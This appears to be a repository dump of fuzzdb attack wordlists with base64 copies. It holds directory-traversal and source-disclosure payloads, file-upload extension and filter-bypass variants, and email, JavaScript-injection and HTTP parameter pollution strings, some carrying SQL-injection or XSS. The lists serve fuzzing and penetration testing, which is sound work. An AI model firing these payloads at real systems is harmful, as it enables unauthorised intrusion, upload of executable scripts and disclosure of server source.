/Manipulations/Manipulations/fuzzdb/attack/disclosure-localpaths/unix/common-unix-httpd-log-locations.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-source/README.md:
--------------------------------------------------------------------------------
1 | Notes:
2 |
3 | **source-disc-cmd-exec-traversal.txt**
4 |
5 | single directory traversals that have caused showcode or command exec issues in the past
6 |
7 | ``` GET /path/*payload*relative/path/to/target/file/ ```
8 |
9 | **source-disclosure-generic.txt**
10 |
11 | known cross-platform source code and file disclosure attack patterns - append after file or dir path
12 |
13 | **source-disclosure-microsoft.txt**
14 |
15 | microsoft-specific - appends after filename - try the generic list for microsoft, too
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-source/source-disc-cmd-exec-traversal.txt:
--------------------------------------------------------------------------------
1 | ..%255c
2 | .%5c../..%5c
3 | /..%c0%9v../
4 | /..%c0%af../
5 | /..%255c..%255c
6 |
7 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-source/source-disc-cmd-exec-traversal.txt.base64:
--------------------------------------------------------------------------------
1 | Li4lMjU1Yw0KLiU1Yy4uLy4uJTVjDQovLi4lYzAlOXYuLi8NCi8uLiVjMCVhZi4uLw0KLy4uJTI1NWMuLiUyNTVjDQoNCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-source/source-disclosure-generic.txt:
--------------------------------------------------------------------------------
1 | %70
2 | .%E2%73%70
3 | %2e0
4 | %2e
5 | .
6 | \
7 | ?*
8 | %20
9 | %00
10 | %2f
11 | %5c
12 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-source/source-disclosure-generic.txt.base64:
--------------------------------------------------------------------------------
1 | JTcwDQouJUUyJTczJTcwDQolMmUwDQolMmUNCi4NClwNCj8qDQolMjANCiUwMA0KJTJmDQolNWMNCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-source/source-disclosure-microsoft.txt:
--------------------------------------------------------------------------------
1 | # microsoft-specific appends - try the generic list, too
2 | +.htr
3 | ::DATA$
4 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-source/source-disclosure-microsoft.txt.base64:
--------------------------------------------------------------------------------
1 | IyBtaWNyb3NvZnQtc3BlY2lmaWMgYXBwZW5kcyAtIHRyeSB0aGUgZ2VuZXJpYyBsaXN0LCB0b28NCisuaHRyDQo6OkRBVEEkDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/email/invalid-email-addresses.txt:
--------------------------------------------------------------------------------
1 | justastring
2 | email@addrese.com;secondemail@address.com
3 | @address.com
4 | Jacco Van Tuijl
5 | email.address.com
6 | email@address@example.com
7 | #@%^%#$@#$@#.com
8 | .email@address.com
9 | うえあいお@address.com
10 | email.@address.com
11 | email..email@address.com
12 | email@address..com
13 | email@address.com (Jacco van Tuijl)
14 | email@-address.com
15 | email@111.222.333.44444
16 | Abc..123@address.com
17 | “(),:;<>[\]@address.com
18 | jacco"van"tuijl@address.com
19 | jacco\ van"someting"tuijl\example@address.com
20 | “email”@address.com
21 | sql"or"1"="1"or"test@email.com
22 | sql'or'1'='1'or'test@email.com
23 | xss"><"test@address.com
24 | a"b(c)d,e:f;gi[j\k]l@example.com
25 | this is"not\allowed@example.com
26 | notallowed@example.com
27 | notallowed@example.com
28 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/email/invalid-email-addresses.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/alt-extensions-asp.txt:
--------------------------------------------------------------------------------
1 | asp
2 | aspx
3 | asa
4 | aSP
5 | aSpx
6 | aSa
7 | asp%20%20%20
8 | aspx%20%20%20
9 | asa%20%20%20
10 | aSP%20%20%20
11 | aSpx%20%20%20
12 | aSa%20%20%20
13 | asp......
14 | aspx......
15 | asa......
16 | aSP......
17 | aSpx......
18 | aSa......
19 | asp%20%20%20...%20.%20..
20 | aspx%20%20%20...%20.%20..
21 | asa%20%20%20...%20.%20..
22 | aSP%20%20%20...%20.%20..
23 | aSpx%20%20%20...%20.%20..
24 | aSa%20%20%20...%20.%20..
25 | asp%00
26 | aspx%00
27 | asa%00
28 | aSp%00
29 | aSpx%00
30 | aSa%00
31 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/alt-extensions-asp.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/alt-extensions-coldfusion.txt:
--------------------------------------------------------------------------------
1 | cfm
2 | cfml
3 | cfc
4 | dbm
5 | cFm
6 | cFml
7 | cFc
8 | dBm
9 | cfm%20%20%20
10 | cfml%20%20%20
11 | cfc%20%20%20
12 | dbm%20%20%20
13 | cFm%20%20%20
14 | cFml%20%20%20
15 | cFc%20%20%20
16 | dBm%20%20%20
17 | cfm......
18 | cfml......
19 | cfc.......
20 | dbm......
21 | cFm......
22 | cFml......
23 | cFc......
24 | dBm......
25 | cfm%20%20%20...%20.%20..
26 | cfml%20%20%20...%20.%20..
27 | cfc%20%20%20...%20.%20..
28 | dbm%20%20%20...%20.%20..
29 | cFm%20%20%20...%20.%20..
30 | cFml%20%20%20...%20.%20..
31 | cFc%20%20%20...%20.%20..
32 | dBm%20%20%20...%20.%20..
33 | cfm%00
34 | cfml%00
35 | cfc%00
36 | dbm%00
37 | cFm%00
38 | cFml%00
39 | cFc%00
40 | dBm%00
41 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/alt-extensions-coldfusion.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/alt-extensions-jsp.txt:
--------------------------------------------------------------------------------
1 | jsp
2 | jspx
3 | jsw
4 | jsv
5 | jspf
6 | jSp
7 | jSpx
8 | jSw
9 | jSv
10 | jSpf
11 | jSp%00
12 | jSp%20%20%20
13 | jSp%20%20%20...%20.%20..a
14 | jSp......
15 | jSpf%00
16 | jSpf%20%20%20
17 | jSpf%20%20%20...%20.%20..a
18 | jSpf......
19 | jSpx%00
20 | jSpx%20%20%20
21 | jSpx%20%20%20...%20.%20..a
22 | jSpx......
23 | jSv%00
24 | jSv%20%20%20
25 | jSv%20%20%20...%20.%20..a
26 | jSv......
27 | jSw%00
28 | jSw%20%20%20
29 | jSw%20%20%20...%20.%20..a
30 | jSw......
31 | jsp%00
32 | jsp%20%20%20
33 | jsp%20%20%20...%20.%20..a
34 | jsp......
35 | jspf%00
36 | jspf%20%20%20
37 | jspf%20%20%20...%20.%20..a
38 | jspf......
39 | jspx%00
40 | jspx%20%20%20
41 | jspx%20%20%20...%20.%20..a
42 | jspx......
43 | jsv%00
44 | jsv%20%20%20
45 | jsv%20%20%20...%20.%20..a
46 | jsv......
47 | jsw%00
48 | jsw%20%20%20
49 | jsw%20%20%20...%20.%20..a
50 | jsw......
51 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/alt-extensions-jsp.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/alt-extensions-perl.txt:
--------------------------------------------------------------------------------
1 | # .pm .lib cannot be called directly, must be called as modules
2 | pl
3 | pm
4 | cgi
5 | pL
6 | pM
7 | cGi
8 | lib
9 | lIb
10 | cGi%00
11 | cGi%20%20%20
12 | cGi......
13 | cgi%00
14 | cgi%20%20%20
15 | cgi......
16 | lIb%00
17 | lIb%20%20%20
18 | lIb......
19 | lib%00
20 | lib%20%20%20
21 | lib......
22 | pL%00
23 | pL%20%20%20
24 | pL......
25 | pM%00
26 | pM%20%20%20
27 | pM......
28 | pl%00
29 | pl%20%20%20
30 | pl......
31 | pm%00
32 | pm%20%20%20
33 | pm......
34 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/alt-extensions-perl.txt.base64:
--------------------------------------------------------------------------------
1 | IyAucG0gLmxpYiBjYW5ub3QgYmUgY2FsbGVkIGRpcmVjdGx5LCBtdXN0IGJlIGNhbGxlZCBhcyBtb2R1bGVzDQpwbA0KcG0NCmNnaQ0KcEwNCnBNDQpjR2kNCmxpYg0KbEliDQpjR2klMDANCmNHaSUyMCUyMCUyMA0KY0dpLi4uLi4uDQpjZ2klMDANCmNnaSUyMCUyMCUyMA0KY2dpLi4uLi4uDQpsSWIlMDANCmxJYiUyMCUyMCUyMA0KbEliLi4uLi4uDQpsaWIlMDANCmxpYiUyMCUyMCUyMA0KbGliLi4uLi4uDQpwTCUwMA0KcEwlMjAlMjAlMjANCnBMLi4uLi4uDQpwTSUwMA0KcE0lMjAlMjAlMjANCnBNLi4uLi4uDQpwbCUwMA0KcGwlMjAlMjAlMjANCnBsLi4uLi4uDQpwbSUwMA0KcG0lMjAlMjAlMjANCnBtLi4uLi4uDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/alt-extensions-php.txt:
--------------------------------------------------------------------------------
1 | phtml
2 | php
3 | php3
4 | php4
5 | php5
6 | inc
7 | pHtml
8 | pHp
9 | pHp3
10 | pHp4
11 | pHp5
12 | iNc
13 | iNc%00
14 | iNc%20%20%20
15 | iNc%20%20%20...%20.%20..
16 | iNc......
17 | inc%00
18 | inc%20%20%20
19 | inc%20%20%20...%20.%20..
20 | inc......
21 | pHp%00
22 | pHp%20%20%20
23 | pHp%20%20%20...%20.%20..
24 | pHp......
25 | pHp3%00
26 | pHp3%20%20%20
27 | pHp3%20%20%20...%20.%20..
28 | pHp3......
29 | pHp4%00
30 | pHp4%20%20%20
31 | pHp4%20%20%20...%20.%20..
32 | pHp4......
33 | pHp5%00
34 | pHp5%20%20%20
35 | pHp5%20%20%20...%20.%20..
36 | pHp5......
37 | pHtml%00
38 | pHtml%20%20%20
39 | pHtml%20%20%20...%20.%20..
40 | pHtml......
41 | php%00
42 | php%20%20%20
43 | php%20%20%20...%20.%20..
44 | php......
45 | php3%00
46 | php3%20%20%20
47 | php3%20%20%20...%20.%20..
48 | php3......
49 | php4%00
50 | php4%20%20%20
51 | php4%20%20%20...%20.%20..
52 | php4......
53 | php5%00
54 | php5%20%20%20
55 | php5%20%20%20...%20.%20..
56 | php5......
57 | phtml%00
58 | phtml%20%20%20
59 | phtml%20%20%20...%20.%20..
60 | phtml......
61 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/alt-extensions-php.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/file-ul-filter-bypass-commonly-writable-directories.txt:
--------------------------------------------------------------------------------
1 | templates_compiled
2 | templates_c
3 | templates
4 | temporary
5 | images
6 | cache
7 | temp
8 | files
9 | tmp
10 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/file-ul-filter-bypass-commonly-writable-directories.txt.base64:
--------------------------------------------------------------------------------
1 | dGVtcGxhdGVzX2NvbXBpbGVkDQp0ZW1wbGF0ZXNfYw0KdGVtcGxhdGVzDQp0ZW1wb3JhcnkNCmltYWdlcw0KY2FjaGUNCnRlbXANCmZpbGVzDQp0bXANCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/file-ul-filter-bypass-microsoft-asp-filetype-bf.txt:
--------------------------------------------------------------------------------
1 | {ASPSCRIPT}
2 | {ASPSCRIPT}.{EXT}
3 | {ASPSCRIPT};
4 | {ASPSCRIPT};.{EXT}
5 | {ASPSCRIPT}%00
6 | {ASPSCRIPT}%00.{EXT}
7 | {ASPSCRIPT}::data%00.
8 | {ASPSCRIPT}::data%00.{EXT}
9 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/file-ul-filter-bypass-microsoft-asp-filetype-bf.txt.base64:
--------------------------------------------------------------------------------
1 | e0FTUFNDUklQVH0NCntBU1BTQ1JJUFR9LntFWFR9DQp7QVNQU0NSSVBUfTsNCntBU1BTQ1JJUFR9Oy57RVhUfQ0Ke0FTUFNDUklQVH0lMDANCntBU1BTQ1JJUFR9JTAwLntFWFR9DQp7QVNQU0NSSVBUfTo6ZGF0YSUwMC4NCntBU1BTQ1JJUFR9OjpkYXRhJTAwLntFWFR9DQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/file-ul-filter-bypass-ms-php.txt:
--------------------------------------------------------------------------------
1 | {PHPSCRIPT}
2 | {PHPSCRIPT}.phtml
3 | {PHPSCRIPT}.php.html
4 | {PHPSCRIPT}.php::$DATA
5 | {PHPSCRIPT}.php.php.rar
6 | {PHPSCRIPT}.php.rar
7 | {PHPSCRIPT}::$DATA
8 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/file-ul-filter-bypass-ms-php.txt.base64:
--------------------------------------------------------------------------------
1 | e1BIUFNDUklQVH0NCntQSFBTQ1JJUFR9LnBodG1sDQp7UEhQU0NSSVBUfS5waHAuaHRtbA0Ke1BIUFNDUklQVH0ucGhwOjokREFUQQ0Ke1BIUFNDUklQVH0ucGhwLnBocC5yYXIgDQp7UEhQU0NSSVBUfS5waHAucmFyIA0Ke1BIUFNDUklQVH06OiREQVRBDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/file-ul-filter-bypass-x-platform-generic.txt:
--------------------------------------------------------------------------------
1 | %00index.html
2 | ;index.html
3 | %00
4 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/file-ul-filter-bypass-x-platform-generic.txt.base64:
--------------------------------------------------------------------------------
1 | JTAwaW5kZXguaHRtbA0KO2luZGV4Lmh0bWwNCiUwMCAgDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/file-ul-filter-bypass-x-platform-php.txt:
--------------------------------------------------------------------------------
1 | {PHPSCRIPT}
2 | {PHPSCRIPT}.phtml
3 | {PHPSCRIPT}.php.html
4 | {PHPSCRIPT}.php.php.rar
5 | {PHPSCRIPT}.php.rar
6 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/file-ul-filter-bypass-x-platform-php.txt.base64:
--------------------------------------------------------------------------------
1 | e1BIUFNDUklQVH0NCntQSFBTQ1JJUFR9LnBodG1sDQp7UEhQU0NSSVBUfS5waHAuaHRtbA0Ke1BIUFNDUklQVH0ucGhwLnBocC5yYXIgDQp7UEhQU0NSSVBUfS5waHAucmFyIA0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/invalid-filenames-linux.txt:
--------------------------------------------------------------------------------
1 | /
2 |
3 | \0
4 | /dev/null
5 | /dev/null/foo
6 | .
7 | ..
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/invalid-filenames-linux.txt.base64:
--------------------------------------------------------------------------------
1 | Lw0KDQpcMA0KL2Rldi9udWxsDQovZGV2L251bGwvZm9vDQouDQouLg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/invalid-filenames-microsoft.txt:
--------------------------------------------------------------------------------
1 | A:
2 | ZZ:
3 | CON
4 | PRN
5 | AUX
6 | CLOCK$
7 | NUL
8 | COM1
9 | COM2
10 | COM3
11 | COM4
12 | COM5
13 | COM6
14 | COM7
15 | COM8
16 | COM9
17 | LPT1
18 | LPT2
19 | LPT3
20 | LPT4
21 | LPT5
22 | LPT6
23 | LPT7
24 | LPT8
25 | LPT9
26 | *
27 | "
28 | [
29 | ]
30 | :
31 | |
32 | =
33 | ,
34 | CON.{EXT}
35 | PRN.{EXT}
36 | AUX.{EXT}
37 | CLOCK$.{EXT}
38 | NUL.{EXT}
39 | COM1.{EXT}
40 | COM2.{EXT}
41 | COM3.{EXT}
42 | COM4.{EXT}
43 | COM5.{EXT}
44 | COM6.{EXT}
45 | COM7.{EXT}
46 | COM8.{EXT}
47 | COM9.{EXT}
48 | LPT1.{EXT}
49 | LPT2.{EXT}
50 | LPT3.{EXT}
51 | LPT4.{EXT}
52 | LPT5.{EXT}
53 | LPT6.{EXT}
54 | LPT7.{EXT}
55 | LPT8.{EXT}
56 | LPT9.{EXT}
57 | *.{EXT}
58 | ".{EXT}
59 | [.{EXT}
60 | ].{EXT}
61 | :.{EXT}
62 | |.{EXT}
63 | =.{EXT}
64 | ,.{EXT}
65 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/invalid-filenames-microsoft.txt.base64:
--------------------------------------------------------------------------------
1 | QToNClpaOg0KQ09ODQpQUk4NCkFVWA0KQ0xPQ0skDQpOVUwNCkNPTTENCkNPTTINCkNPTTMNCkNPTTQNCkNPTTUNCkNPTTYNCkNPTTcNCkNPTTgNCkNPTTkNCkxQVDENCkxQVDINCkxQVDMNCkxQVDQNCkxQVDUNCkxQVDYNCkxQVDcNCkxQVDgNCkxQVDkNCioNCiINClsNCl0gDQo6IA0KfCANCj0gDQosDQpDT04ue0VYVH0NClBSTi57RVhUfQ0KQVVYLntFWFR9DQpDTE9DSyQue0VYVH0NCk5VTC57RVhUfQ0KQ09NMS57RVhUfQ0KQ09NMi57RVhUfQ0KQ09NMy57RVhUfQ0KQ09NNC57RVhUfQ0KQ09NNS57RVhUfQ0KQ09NNi57RVhUfQ0KQ09NNy57RVhUfQ0KQ09NOC57RVhUfQ0KQ09NOS57RVhUfQ0KTFBUMS57RVhUfQ0KTFBUMi57RVhUfQ0KTFBUMy57RVhUfQ0KTFBUNC57RVhUfQ0KTFBUNS57RVhUfQ0KTFBUNi57RVhUfQ0KTFBUNy57RVhUfQ0KTFBUOC57RVhUfQ0KTFBUOS57RVhUfQ0KKi57RVhUfQ0KIi57RVhUfQ0KWy57RVhUfQ0KXS57RVhUfSANCjoue0VYVH0gDQp8LntFWFR9IA0KPS57RVhUfSANCiwue0VYVH0NCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/invalid-filesystem-chars-microsoft.txt:
--------------------------------------------------------------------------------
1 | *
2 | .
3 | "
4 | /
5 | \
6 | [
7 | ]
8 | :
9 | ;
10 | |
11 | =
12 | ,
13 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/invalid-filesystem-chars-microsoft.txt.base64:
--------------------------------------------------------------------------------
1 | KiANCi4gDQoiIA0KLyANClwgDQpbIA0KXSANCjogDQo7IA0KfCANCj0gDQosDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/invalid-filesystem-chars-osx.txt:
--------------------------------------------------------------------------------
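1 | # List of characters that are invalid in OS X filenames. They can be used during file-upload bypass testing to try to trigger an error condition that might reveal an absolute path. Useful if you're not sure where your files are landing. A path appearing in the error response is itself a finding: the upload handler should return a generic error instead.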
2 | # fuzz these into a filename during upload attempts
3 | :
4 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/invalid-filesystem-chars-osx.txt.base64:
--------------------------------------------------------------------------------
1 | IyBsaXN0IG9mIGludmFsaWQgY2hhcmFjdGVycyBmb3Igb3N4IC0gdGhlc2UgY2FuIGJlIHVzZWQgdG8gYXR0ZW1wdCB0byBjYXVzZSBhbiBlcnJvciBjb25kaXRpb24gZHVyaW5nIGZpbGUgdXBsb2FkIGJ5cGFzcyBhdHRlbXB0cyB3aGljaCBtaWdodCByZXZlYWwgYW4gYWJzb2x1dGUgcGF0aC4gVXNlZnVsIGlmIHlvdSdyZSBub3Qgc3VyZSB3aGVyZSB5b3VyIGZpbGVzIGFyZSBsYW5kaW5nLg0KIyBmdXp6IHRoZXNlIGludG8gYSBmaWxlbmFtZSBkdXJpbmcgdXBsb2FkIGF0dGVtcHRzDQo6IA0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/POC_img_phpinfo-CR.gif:
--------------------------------------------------------------------------------
1 | GIF89a1
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/POC_img_phpinfo-LF-CR.gif:
--------------------------------------------------------------------------------
1 | GIF89a1
2 |
3 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/POC_phpinfo-metadata.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/queen-of-code/DotnetModelFuzzing/b67a47f8b5e50f5d49f02fe5f9ab2b3253ecc38c/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/POC_phpinfo-metadata.gif
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/POC_phpinfo-metadata.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/queen-of-code/DotnetModelFuzzing/b67a47f8b5e50f5d49f02fe5f9ab2b3253ecc38c/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/POC_phpinfo-metadata.jpg
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/lottapixel.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/queen-of-code/DotnetModelFuzzing/b67a47f8b5e50f5d49f02fe5f9ab2b3253ecc38c/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/lottapixel.jpg
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/uber.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/queen-of-code/DotnetModelFuzzing/b67a47f8b5e50f5d49f02fe5f9ab2b3253ecc38c/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/uber.gif
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/xssproject.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/queen-of-code/DotnetModelFuzzing/b67a47f8b5e50f5d49f02fe5f9ab2b3253ecc38c/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/xssproject.swf
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/html_js_fuzz/html_tags.txt.base64:
--------------------------------------------------------------------------------
1 | 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
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/html_js_fuzz/javascript_events.txt:
--------------------------------------------------------------------------------
1 | onafterprint
2 | onbeforeprint
3 | onbeforeonload
4 | onblur
5 | onerror
6 | onfocus
7 | onhaschange
8 | onload
9 | onmessage
10 | onoffline
11 | ononline
12 | onpagehide
13 | onpageshow
14 | onpopstate
15 | onredo
16 | onresize
17 | onstorage
18 | onundo
19 | onunload
20 | onblur
21 | onchange
22 | oncontextmenu
23 | onfocus
24 | onformchange
25 | onforminput
26 | oninput
27 | oninvalid
28 | onreset
29 | onselect
30 | onsubmit
31 | onkeydown
32 | onkeypress
33 | onkeyup
34 | onclick
35 | ondblclick
36 | ondrag
37 | ondragend
38 | ondragenter
39 | ondragleave
40 | ondragover
41 | ondragstart
42 | ondrop
43 | onmousedown
44 | onmousemove
45 | onmouseout
46 | onmouseover
47 | onmouseup
48 | onmousewheel
49 | onscroll
50 | onabort
51 | oncanplay
52 | oncanplaythrough
53 | ondurationchange
54 | onemptied
55 | onended
56 | onerror
57 | onloadeddata
58 | onloadedmetadata
59 | onloadedstart
60 | onpause
61 | onplay
62 | onplaying
63 | onprogress
64 | onratechange
65 | onreadystatechange
66 | onseeked
67 | onseeking
68 | onstalled
69 | onsuspend
70 | ontimeupdate
71 | onvolumechange
72 | onwaiting
73 | style
74 |
75 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/html_js_fuzz/javascript_events.txt.base64:
--------------------------------------------------------------------------------
1 | b25hZnRlcnByaW50DQpvbmJlZm9yZXByaW50DQpvbmJlZm9yZW9ubG9hZA0Kb25ibHVyDQpvbmVycm9yDQpvbmZvY3VzDQpvbmhhc2NoYW5nZQ0Kb25sb2FkDQpvbm1lc3NhZ2UNCm9ub2ZmbGluZQ0Kb25vbmxpbmUNCm9ucGFnZWhpZGUNCm9ucGFnZXNob3cNCm9ucG9wc3RhdGUNCm9ucmVkbw0Kb25yZXNpemUNCm9uc3RvcmFnZQ0Kb251bmRvDQpvbnVubG9hZA0Kb25ibHVyDQpvbmNoYW5nZQ0Kb25jb250ZXh0bWVudQ0Kb25mb2N1cw0Kb25mb3JtY2hhbmdlDQpvbmZvcm1pbnB1dA0Kb25pbnB1dA0Kb25pbnZhbGlkDQpvbnJlc2V0DQpvbnNlbGVjdA0Kb25zdWJtaXQNCm9ua2V5ZG93bg0Kb25rZXlwcmVzcw0Kb25rZXl1cA0Kb25jbGljaw0Kb25kYmxjbGljaw0Kb25kcmFnDQpvbmRyYWdlbmQNCm9uZHJhZ2VudGVyDQpvbmRyYWdsZWF2ZQ0Kb25kcmFnb3Zlcg0Kb25kcmFnc3RhcnQNCm9uZHJvcA0Kb25tb3VzZWRvd24NCm9ubW91c2Vtb3ZlDQpvbm1vdXNlb3V0DQpvbm1vdXNlb3Zlcg0Kb25tb3VzZXVwDQpvbm1vdXNld2hlZWwNCm9uc2Nyb2xsDQpvbmFib3J0DQpvbmNhbnBsYXkNCm9uY2FucGxheXRocm91Z2gNCm9uZHVyYXRpb25jaGFuZ2UNCm9uZW1wdGllZA0Kb25lbmRlZA0Kb25lcnJvcg0Kb25sb2FkZWRkYXRhDQpvbmxvYWRlZG1ldGFkYXRhDQpvbmxvYWRlZHN0YXJ0DQpvbnBhdXNlDQpvbnBsYXkNCm9ucGxheWluZw0Kb25wcm9ncmVzcw0Kb25yYXRlY2hhbmdlDQpvbnJlYWR5c3RhdGVjaGFuZ2UNCm9uc2Vla2VkDQpvbnNlZWtpbmcNCm9uc3RhbGxlZA0Kb25zdXNwZW5kDQpvbnRpbWV1cGRhdGUNCm9udm9sdW1lY2hhbmdlDQpvbndhaXRpbmcNCnN0eWxlDQoNCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/html_js_fuzz/js_inject.txt:
--------------------------------------------------------------------------------
1 | function(){ return this.userid}
2 | ' function(){ return this.username} or '1'='1
3 | function(){return version()}
4 | function(){return version}
5 | t'; return this; var d='!
6 | " function(){ return this} or '1'='1
7 | t"; return this; var d='!
8 | ' || this || '1'=='1
9 | ' || this.version || '1'=='1
10 | ' || '1'=='1
11 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/html_js_fuzz/js_inject.txt.base64:
--------------------------------------------------------------------------------
1 | ZnVuY3Rpb24oKXsgcmV0dXJuIHRoaXMudXNlcmlkfQ0KJyBmdW5jdGlvbigpeyByZXR1cm4gdGhpcy51c2VybmFtZX0gb3IgJzEnPScxDQpmdW5jdGlvbigpe3JldHVybiB2ZXJzaW9uKCl9DQpmdW5jdGlvbigpe3JldHVybiB2ZXJzaW9ufQ0KdCc7IHJldHVybiB0aGlzOyB2YXIgZD0nIQ0KIiBmdW5jdGlvbigpeyByZXR1cm4gdGhpc30gb3IgJzEnPScxDQp0IjsgcmV0dXJuIHRoaXM7IHZhciBkPSchDQonIHx8IHRoaXMgfHwgJzEnPT0nMQ0KJyB8fCB0aGlzLnZlcnNpb24gfHwgJzEnPT0nMQ0KJyB8fCAnMSc9PScxDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/html_js_fuzz/quotationmarks.txt:
--------------------------------------------------------------------------------
1 | '
2 | "
3 | ''
4 | ""
5 | '"'
6 | "''''"'"
7 | "'"'"''''"
8 |
9 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/html_js_fuzz/quotationmarks.txt.base64:
--------------------------------------------------------------------------------
1 | Jw0KIg0KJycNCiIiDQonIicNCiInJycnIiciDQoiJyInIicnJyciDQo8Zm9vIHZhbD3DouKCrMWTYmFyw6LigqzCnSAvPg0KPGZvbyB2YWw9w6LigqzFk2JhcsOi4oKswp0gLz4NCjxmb28gdmFsPcOi4oKswp1iYXLDouKCrMWTIC8+DQo8Zm9vIHZhbD1gYmFyJyAvPg0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/README.md:
--------------------------------------------------------------------------------
1 | References:
2 |
3 | http://ha.ckers.org/response-splitting.html
4 |
5 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/docs.http-method-defs.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/queen-of-code/DotnetModelFuzzing/b67a47f8b5e50f5d49f02fe5f9ab2b3253ecc38c/Manipulations/Manipulations/fuzzdb/attack/http-protocol/docs.http-method-defs.html
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/http-protocol/hpp.txt:
--------------------------------------------------------------------------------
1 | # HTTP parameter pollution and interpretation payloads by Jacco van Tuijl
2 | ?id=id=1
3 | &id=1?id=2
4 | ?id['&id=1']=2
5 | ?id[1&id=2]=1
6 | ?id=1&id=2
7 | &id=1&id=2
8 | ?id=1%26id%3D2
9 | ?id&id=1
10 | ????id=1
11 | &&&&id=1
12 | ?id=id['1']=2
13 | ?id=1#id=2
